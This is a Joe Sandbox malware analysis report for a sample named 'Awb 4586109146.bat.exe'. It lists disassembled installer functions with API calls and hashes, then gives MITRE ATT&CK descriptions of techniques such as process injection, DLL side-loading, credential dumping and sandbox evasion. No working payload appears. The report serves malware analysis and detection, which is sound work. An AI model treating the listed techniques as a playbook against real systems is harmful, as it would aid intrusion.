Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D0,0040A5D0,00000000,00000000,0040A5D0,00440000,?,?,00000031), ref: 004017D5

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,?,755723A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
Opcode Fuzzy Hash: 6e9a8046af19eb094d6abfdf57eef79a3d41af2fa463d12146f877a34a213090
Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
Opcode Fuzzy Hash: 0df72e3b5cf70d21c530e24e682e28afae01b7faaf581061804cefe84a28b9e7
Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
Instruction ID: f6b005b132729ba5a1909f4a704d5e159ac18246d791616e3be01574202a0a4f
Opcode Fuzzy Hash: ffa308e51fc2a7dd0918d2a0305ef53ba2975e26ebd74a39f79ceeac246a8f65
Instruction Fuzzy Hash: 4EF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18

Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
wsprintfW.USER32 ref: 00404B88
SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B

Strings

%u.%u%s%s, xrefs: 00404B69

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
Instruction ID: 49dacc2217062e77d4dc452dcd456e10a33323318ced1260d8f84a7edb165714
Opcode Fuzzy Hash: be899ce802f4ada5aa38b77195d66e19eeaafb4e1a6305ece11e6f52dcfdaeb3
Instruction Fuzzy Hash: D911C3736041283ADB00656D9C46F9E369C9B85334F254237FA25F21D1E979D82182E8

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68

Function 004057F1 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405834
GetLastError.KERNEL32 ref: 00405848
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
GetLastError.KERNEL32 ref: 00405867

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
Instruction ID: ba23c68ca914eac1f4c080bcf69ea635dc5c4ffa9688b42209883b937cdf97fb
Opcode Fuzzy Hash: 5c4e852214d6767aab513baeadf18d74bcc02012da70e31d5af0b3f9b2778c41
Instruction Fuzzy Hash: 7FF03A30541630FBC6706B20FE0DA8B7B65FB44B02B42497AF002A19A4C7B849818ADC

Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004052C5
CallWindowProcW.USER32(?,?,?,?), ref: 00405316

Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F

Strings

, xrefs: 004052A6

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E

Function 00405DDF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405DFD
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,0043F000,0040338D,00441000,00441800,00441800,00441800,00441800,00441800,75573420,004035D9), ref: 00405E18

Strings

nsa, xrefs: 00405DEC

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
CloseHandle.KERNEL32(?), ref: 004058D9

Strings

Error launching installer, xrefs: 004058B6

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78

Function 00405D15 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D3D
CharNextA.USER32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57

Memory Dump Source

Source File: 00000006.00000002.3880866593.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.3880848042.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880887307.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880906838.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Awb 4586109146.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: cc601e2af81a4130f3690bf6756e9ae730db34a97aa71f580e1783f9e5236296
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 3DF0F631200818FFC7129FA4DD049AFBBA8EF06354B2580BAE840F7211D634DE02AF98

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Awb 4586109146.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

